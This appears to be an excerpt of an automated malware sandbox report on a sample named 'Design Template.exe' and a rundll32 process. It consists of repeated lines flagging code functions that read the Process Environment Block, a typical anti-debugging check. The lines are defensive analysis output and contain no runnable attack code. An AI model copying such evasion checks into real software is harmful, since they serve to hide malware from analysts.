        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A316E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A176E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A48EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A336CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0E620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABFE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A38E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A18794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A437F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A04F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A04F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3E730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2F716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1FF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1EF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BBC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045414FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C3D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04503540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A7D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0450A537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454E539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448AD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04538DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B35A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045505AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045505AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B8E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448E620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0453FE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B36CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C8EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0453FEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B16E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044976E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451FE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045046A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449EF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449FF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AF716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04484F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04484F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BE730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C37F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04498794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04551074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04542073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04554015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04554015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044858EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04503884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04503884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C90AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BF0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BF0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BF0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045141E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AC182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B61A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B61A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045051BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045051BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045051BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045051BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045069A6 mov eax, dword ptr fs:[00000030h]
